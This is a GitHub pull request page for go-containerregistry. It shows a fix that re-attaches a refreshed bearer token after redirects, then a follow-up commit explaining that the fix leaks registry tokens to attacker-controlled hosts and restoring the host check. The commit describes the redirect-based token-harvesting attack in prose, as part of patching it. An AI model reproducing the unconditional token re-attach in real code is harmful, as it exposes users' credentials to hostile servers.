fix(transport): apply refreshed bearer token after cross-host redirect by 64johnlee · Pull Request #2337 · google/go-containerregistry (original) (raw)

@64johnlee

When an http.Client-level redirect sends a request to a host that differs from bt.registry, the sendRequest() closure skips setting the Authorization header (its matchesHost guard returns false). The previous code called sendRequest() again after bt.refresh(), so the freshly fetched token was never applied to the retried request and the client received a second 401 instead of succeeding.

Fix by reading the token directly from bt.bearer after a successful refresh and setting the Authorization header unconditionally before retrying, bypassing the matchesHost guard that is only needed to prevent header forwarding on client-visible redirects.

Closes google#2333

Subserial

@Subserial

Subserial pushed a commit that referenced this pull request

Jun 17, 2026

@evilgensec

…2349)

PR #2337 made bearerTransport.RoundTrip set the Authorization header unconditionally on the post-401 retry, bypassing the matchesHost guard. That guard exists to stop the credential being forwarded across an http.Client-level redirect to a different host. With it bypassed, a malicious or compromised registry can 302 a manifest/blob fetch to an attacker-controlled host, answer the follow-up request with a Bearer challenge, and harvest the operator's registry token: the client refreshes the token from the trusted realm and then sends it to the redirected host.

Gate the re-attach on matchesHost so the refreshed token is only applied when the request is still talking to the registry we authenticated against; for a cross-host request fall back to sendRequest(), which omits the credential. This preserves the #2333 fix for same-host 401 retries (e.g. mid-session token expiry) while closing the credential leak.

Add a regression test for the same-host retry and a test asserting the token is not leaked to a cross-host challenger.

This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.Learn more about bidirectional Unicode characters

[ Show hidden characters]({{ revealButtonHref }})